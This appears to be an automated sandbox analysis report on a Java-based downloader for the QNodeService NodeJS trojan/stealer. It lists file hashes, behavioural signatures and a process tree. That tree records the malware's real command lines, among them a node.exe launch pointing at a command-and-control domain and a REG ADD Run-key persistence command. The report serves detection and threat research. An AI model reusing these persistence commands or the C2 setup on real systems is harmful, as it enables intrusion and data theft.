Analysis
-
max time kernel
147s -
max time network
125s -
platform
windows10_x64 -
resource
win10 -
submitted
13-10-2020 05:44
Static task
static1
Behavioral task
behavioral1
Sample
AWB20201012.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
AWB20201012.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
AWB20201012.jar
-
Size
183KB
-
MD5
aa3320b8e3e59a930e952619b4f0b0ed
-
SHA1
100a79f58f7402410d87c399c85765d0d26e365a
-
SHA256
846a118d19c8f3d72b77fd81af21a17f0b006f1a86eae66b6ef9b43f4be70e12
-
SHA512
1c9091e9c30f9698057858a2309822b41b8cd153b0c14cf9981a1ab0b104c71cafe7743670e781c8e9f8bd20bf5f577d200b94e6785620688f9c4129495e57c2
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 904 node.exe 644 node.exe 2608 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\7aed7602-3923-4da3-bc68-f2e2ce2a3a34 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad92-168.dat js behavioral2/files/0x000100000001ad92-171.dat js behavioral2/files/0x000100000001ad92-175.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 wtfismyip.com 16 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 904 node.exe 904 node.exe 904 node.exe 904 node.exe 644 node.exe 644 node.exe 644 node.exe 644 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe 2608 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2920 wrote to memory of 2380 2920 java.exe 74 PID 2920 wrote to memory of 2380 2920 java.exe 74 PID 2380 wrote to memory of 904 2380 javaw.exe 78 PID 2380 wrote to memory of 904 2380 javaw.exe 78 PID 904 wrote to memory of 644 904 node.exe 80 PID 904 wrote to memory of 644 904 node.exe 80 PID 644 wrote to memory of 2608 644 node.exe 81 PID 644 wrote to memory of 2608 644 node.exe 81 PID 2608 wrote to memory of 1700 2608 node.exe 83 PID 2608 wrote to memory of 1700 2608 node.exe 83 PID 1700 wrote to memory of 3940 1700 cmd.exe 84 PID 1700 wrote to memory of 3940 1700 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\AWB20201012.jar1⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\91eba624.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain chinpao.hopto.org --hub-domain localhost3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_MLgw1o\boot.js --hub-domain chinpao.hopto.org --hub-domain localhost4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_MLgw1o\boot.js --hub-domain chinpao.hopto.org --hub-domain localhost5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7aed7602-3923-4da3-bc68-f2e2ce2a3a34" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7aed7602-3923-4da3-bc68-f2e2ce2a3a34" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3940
-
-
-
-
-
-